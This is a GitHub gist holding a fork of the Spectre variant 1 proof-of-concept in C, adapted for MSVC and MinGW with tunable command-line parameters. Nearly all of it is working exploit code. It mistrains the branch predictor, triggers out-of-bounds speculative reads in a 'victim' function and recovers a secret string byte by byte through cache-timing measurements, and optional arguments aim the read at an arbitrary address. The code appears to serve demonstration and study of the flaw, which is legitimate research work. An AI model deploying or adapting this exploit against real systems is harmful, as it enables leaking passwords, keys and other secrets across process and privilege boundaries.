Skip to content

Instantly share code, notes, and snippets.

@MarkJurich

MarkJurich/spectre.c

Forked from ErikAugust/spectre.c
Last active November 17, 2020 00:57
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save MarkJurich/319a23a7d362d355480fd7ac659c2618 to your computer and use it in GitHub Desktop.
Save MarkJurich/319a23a7d362d355480fd7ac659c2618 to your computer and use it in GitHub Desktop.
Download ZIP
Spectre example code
Raw
spectre.c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> // for rdtscp and clflush
#pragma optimize("gt",on)
#else
#include <x86intrin.h> // for rdtscp and clflush
#endif
/*
Checked out under Win7x64 using MSVC2010 (x86 code in "Debug" Build (no optimizations)) as a C++ Win32
Console Application (uncheck pre-compiled header).
Command Line Arguments (defaults): Cache Hit Threshold (80), Success Addition Factor (0),
Success Multiplier (2) & Previous 2 Memory Address Arguments in
Original Source.
Dependencies: MSVCR100D.DLL (x86 version for Debug Build, or MSVCR100.DLL (x86 version for Run Build)
Should run on older CPUs not supporting __rdtscp (uses __rdtsc()), as well as newer CPUs, but rdtscp is
preferred for new CPUs.
| Also compiles with MinGW64 (64-bit) without modification. This config/install was used as a test:
| http://www.willus.com/mingw/mingw720_20171020.html
| (using go64.bat with "goclear.bat" line commented out, since it wasn't defined/given
| in the distribution)
*/
/********************************************************************
Victim code
********************************************************************/
unsigned int array1_size = 16;
uint8_t unused1[64]; uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 }; uint8_t unused2[64];
uint8_t array2[256 * 512];
char *secret = "The Magic Words are Squeamish Ossifrage.";
uint8_t temp = 0; // Used so compiler won’t optimize out victim_function()
void victim_function(size_t x) { if (x < array1_size) temp &= array2[array1[x] * 512]; }
/********************************************************************
Analysis code
********************************************************************/
// assume cache hit if time <= threshold
int cache_hit_threshold = 80; int addition = 0; int multiplier = 2;
// Report best guess in value[0] and runner-up in value[1]
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2])
{
static int results[256]; int tries, i, j, k, mix_i = 0; unsigned int junk = 0;
size_t training_x, x; register uint64_t time1, time2; volatile uint8_t *addr; volatile int z;
for (i = 0; i < 256; i++) results[i] = 0;
for (tries = 999; tries > 0; tries--)
{
// Flush array2[256*(0..255)] from cache
for (i=0; i<256; i++) _mm_clflush(&array2[i*512]); // intrinsic for clflush instruction
// 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x)
training_x = tries % array1_size;
for (j = 29; j >= 0; j--)
{
_mm_clflush(&array1_size);
for (z = 0; z < 100; z++) {} // Delay (can also mfence)
// Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0
// Avoid jumps in case those tip off the branch predictor
x = ((j % 6) - 1) & ~0xFFFF; // Set x=FFF.FF0000 if j%6==0, else x=0
x = (x | (x >> 16)); // Set x=-1 if j&6=0, else x=0
x = training_x ^ (x & (malicious_x ^ training_x));
victim_function(x); // Call the victim!
}
// Time reads. Order is lightly mixed up to prevent stride prediction
for (i = 0; i < 256; i++)
{
mix_i = ((i * 167) + 13) & 255; addr = &array2[mix_i * 512];
_mm_lfence(); time1 = __rdtsc(); // READ TIMER, FENCED TO ENSURE SERIALIZATION (old CPU compatibility)
junk = *addr; // MEMORY ACCESS TO TIME
_mm_lfence(); time2 = __rdtsc() - time1; // READ TIMER & COMPUTE ELAPSED TIME, (FENCED)
if (time2<=cache_hit_threshold && mix_i!=array1[tries%array1_size]) results[mix_i]++; // cache hit
}
// Locate highest & second-highest results, tallies in j/k
j=k=-1;
for (i= 0; i<256; i++)
{
if (j<0 || results[i]>=results[j]) { k=j; j=i; }
else if (k<0 || results[i]>=results[k]) k=i;
}
// Clear success if best is > 2*runner-up + 5 or 2/0)
if ((results[j]>=(2*results[k]+5))||(results[j]==2 && results[k]==0)) break;
}
results[0] ^= junk; // use junk so code above won’t get optimized out
value[0] = (uint8_t)j; score[0] = results[j]; value[1] = (uint8_t)k; score[1] = results[k];
}
int main(int argc, const char** argv)
{
size_t malicious_x=(size_t)(secret-(char*)array1); // default for malicious_x
int i, score[2], len=40; uint8_t value[2]; int Successful;
for (i = 0; i < sizeof(array2); i++) array2[i] = 1; // write to array2 so in RAM not copy-on-write zero pages
// Handle Command Line Arguments, if any
if (argc > 1) sscanf_s(argv[1], "%d", &cache_hit_threshold);
if (argc > 2) sscanf_s(argv[2], "%d", &addition);
if (argc > 3) sscanf_s(argv[3], "%d", &multiplier);
if (argc == 6)
{
sscanf_s(argv[4], "%p", (void**)(&malicious_x));
malicious_x -= (size_t)array1; // Convert input value into a pointer
sscanf_s(argv[5], "%d", &len);
}
printf("Reading %d bytes with Cache Hit Threshold of %d, addition value of %d & multiplier of %d:\n",
len, cache_hit_threshold, addition, multiplier);
while (--len >= 0)
{
printf("Reading at malicious_x = %p... ", (void*)malicious_x);
do
{
readMemoryByte(malicious_x,value,score);
Successful = (score[0]==2 && score[1]==0) ||
(score[0]>=multiplier*score[1]+addition && !(score[0]==3 && score[1]==0));
}
while (!Successful);
printf("%s: ", Successful ? "Success" : "Unclear");
printf("0x%02X=\'%c\' score=%3d ",value[0],(value[0]>31 && value[0]<127 ? value[0] : '?'),score[0]);
if (score[1] > 0) printf("(second best: 0x%02X score=%3d)", value[1], score[1]);
printf("\n");
malicious_x++;
}
return (0);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment